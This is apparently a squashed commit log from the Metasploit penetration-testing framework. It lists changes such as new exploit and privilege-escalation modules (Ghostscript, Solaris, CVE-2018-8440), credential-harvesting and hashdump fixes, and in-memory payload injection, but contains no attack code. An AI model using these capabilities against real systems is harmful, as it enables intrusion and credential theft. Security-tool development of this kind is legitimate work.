* Add Ghostscript failed restore exploit

* Eschew updating imagemagick_delegate

The hype is over, and the target was provided as a bonus. Now update the
module language to reflect that.

* Refactor targets to align with current style

* Add Linux dropper target

* Add module doc

* automatic module_metadata_base.json update

* Cleanup for foxit_reader_uaf

* automatic module_metadata_base.json update

* Refactor SSH mixins and update modules

* hash_dump now working properly up to Mac OS X High Sierra (10.13.6 included)

* automatic module_metadata_base.json update

* struts2_namespace_ognl updates from code review

Thanks to @wvu, @firefart, and @wchen!

* added function to grab and store user and passwd

* Weekly dependency update

* modified doc to reflect new output

* modified line in scenarios output

* Address travis errors: Updated metadata and target OS logic

* Condense note transformation inside mod_meta_common

* Use a 'reduce' to transform notes

* Use a string hash key for documentation

* Refactor initialization of module's notes attribute

* Handling for Tomcat namespace issues, 'allowStaticMethodAccess' settings, and payload output

Depending on the configuration of the Tomcat server, `allowStaticMethodAccess` may already be set.  We now try to detect this as part of `profile_target`.  But that check might fail.  If so, we'll try our best and let the user control whether we prepend OGNL to enable `allowStaticMethodAccess` via the 'ENABLE_OGNL' option.

Additionally, sometimes enabling `allowStaticMethodAccess` will cause the OGNL query to fail.

Additionally additionally, some Tomcat configurations won't provide output from the payload.  We'll detect that the payload ran successfully, but tell the user there was no output.

* storing config file, changed regex

* modified regex lines

* Quote-block cleanup and improved error handling

* Fixup reverse_ord_tcp docs

* DRY up doc generator

* Add CVE reference to ghostscript_failed_restore.rb

* Move CVE ref to top as per ~standard~

* Make some small changes:

Changes made:

* DisclosureDate
* Privileged to false
* Remove gsub for ';'
* Set cmd/unix/generic as the default payload for ARCH_CMD (linux)

* automatic module_metadata_base.json update

* automatic module_metadata_base.json update

* fix pathing in mremoteng

* vi loves tabs but i dont

* save as xml since it is

* save xml files as xml

* automatic module_metadata_base.json update

* Normalize loot type OID

1. Include the vendor, product, and technology
2. Content type is already reported, extension changed
3. Original filename including extension is also reported

Can we get some sort of standard on the OID?

* automatic module_metadata_base.json update

* Fix store_loot OID

It's supposed to be a loot type, not the filename (now stored).

* automatic module_metadata_base.json update

* automatic module_metadata_base.json update

* automatic module_metadata_base.json update

* Fix crash when using sessions -x

* Fix Msf::Post::Solaris::Kernel class name

* Add Solaris libnspr NSPR_LOG_FILE Privilege Escalation module

* Check WritableDir is writable

* add gcc path for solaris

* Add ForceExploit option

* Minor fixups for `grep`

Use Shellwords to join words that have been shellsplit and will be
shellsplit again, and correctly reference a missing command name.

* Relocate option parsing error handling up a level

* Add mode to Shell#run_single to re-raise errors

* Add `repeat` command to loop msfconsole commands

* Replace 'and' with '&&'

* Update heartbleed description to mention `repeat`

* Fix missing exception capture

* Add SMB2 support to smb_enumshares

* Add check for Solaris system patches

* add chmod tab completion

* automatic module_metadata_base.json update

* Update warning message when loading mimikatz on new OSes

* Update description with correct patched release

* Fix Msf::Post::Solaris::System pidof method

* Cleanup is_root? method for Linux::Priv / Solaris::Priv

* automatic module_metadata_base.json update

* Typo fixes

* Print help when `repeat` is run with no commands

* Weekly dependency update

* first attempt at srsexec

* debugging srsexec

* move gather to escalate

* Add metadata for teradata_odbc_sql.py

* Undo metadata change for teradata_odbc_sql.py

* Revert doc changes to exploit.rb autofilter

I think the changes might have been accidental.

3cf4329

* Check DB is active before querying sessions

* Warn user about inactive sessions without DB

* srsexec working properly

* Remember to assign `self.prompt` in shell.rb

Not everything updates the prompt all the time, make them feel welcome.

* WIP: Initial CVE-2018-8440 / ALPC-TaskSched-LPE

* Refactor cmd_shell and add cmd_shell_{help,tabs}

* finish srsexec add docs

* msftidy

* Initial metadata setup

* use tr instead of gsub

rails/rails#17257

https://github.com/JuanitoFatas/fast-ruby#stringgsub-vs-stringtr-code

* remove redundant hash merge

https://github.com/JuanitoFatas/fast-ruby#hashmerge-vs-hash-code

* use max instead of sort_by { |p| p.size }.last

`sort_by { |p| p.size }.last` is less readable compared to just using the `max` method

I believe this does basicall the exact same thing, ontop of being much faster in my micro benchmark.

The old method was, something like, 8 times slower.

* Leave notes type as a plain hash

* Consolidate notes reference in erb templates

* Upcase all the things

* Redo dllinjection

* changes from first review

* Add writable? method to Msf::Post::File - Fix rapid7#10644

* fix travis issues

* Update gcc path

* Fix http://seclists.org links to https://

I have no idea how this happened in my own code. I was seeing https://.

* add ios blur dos module

* Update gcc path for Solaris

* improve div tags

* update description

* Update gcc path for Solaris

* Add check for Solaris system patch revision

* Background payload execution

* use max instead of sort[-1]

* use tr instead of gsub

* use delete! insteas of gsub

* use tr instead of gsub

* use tr insteas of gsub

* Add references, clean up code.

* deregister_options RHOSTS

* getting user credentials

* automatic module_metadata_base.json update

* Updated VS solution and module

* install docker-compose manually

* comment better

* deregister RHOSTS as well

* automatic module_metadata_base.json update

* Add Solaris 'EXTREMEPARR' dtappgather Privilege Escalation module

* Fix issue when kill a non-existent job.

* Fix issue when kill a job with non-integer jobid

* Add a comment

* Move AKA reference to Notes hash

* Fix crash issue when auto complete the session option.

* added documentation for module

* removed remaining line from template

* storing user credentials

* changed wording and line numbers

* added check for valid apikey, changed available?

* randomize number, use vars_get

* changed available? expression

* renamed/relocated files, changed uri

* Use System Directory

* Specific target, add process option

* use max_by &:size instead of max

this should fix the issue in the PR

* Add documentation

* Added description to module

* changed location of dolibarr module/documentation

* automatic module_metadata_base.json update

* automatic module_metadata_base.json update

* Update documentation

* automatic module_metadata_base.json update

* Inject Payload to Memory First

* Remove uploading payload dll to disk

* Rename Pimcore and Dolibarr SQLi modules

* automatic module_metadata_base.json update

* Add spec test for cmd_set_tabs.

* Remove unused code

* Remove additional unused code

* Weekly dependency update

* Fix remaining typos

* automatic module_metadata_base.json update

* update mettle version

* Update Payload cached sizes

* automatic module_metadata_base.json update

* Add LEAK_COUNT option to Heartbleed

I should have done this in 2014, but I'm a slacker.

* print when not verbose

* automatic module_metadata_base.json update

* automatic module_metadata_base.json update

* Prefer to_s over || ''

Oops, I wasn't thinking clearly. to_s is cleaner.

* Prefer to_s.empty?

Oh, hell, do it here, too.

* automatic module_metadata_base.json update

* Remove stray quote from raise in writable? method

Didn't break the string but looked funny.

* Fix NameError in cmd_shell due to renamed variable

I missed this while refactoring. I didn't use the var after all. :'(

* Prefer ye olde TeX-style quotes

This was @bcoles' initial commit. I agree. Looks good with the raise.

* Update documentation

* Move setup info, remove accessors

* Msftidy

* Code cleanup, feedback from bcoles

* Create credential table.

* Create credential table.

* Update documentation to match new output.

* specify meterpreter, update documentation

Warning is after spell...

* automatic module_metadata_base.json update

* Add pry command to Meterpreter

* Add pry -h

* Print nicely about what object you're in

* Update tested versions

* automatic module_metadata_base.json update

* Improve the context to be more percise.

* automatic module_metadata_base.json update

* Add documentation for rapid7#10652

* fix typo

* automatic module_metadata_base.json update

* fix user enumeration methods, be more robust

* use non-system users for hashdump

* automatic module_metadata_base.json update

* Fix undefined method `session` issue, thx wchen-r7

* Add require readline to fix uninit issue.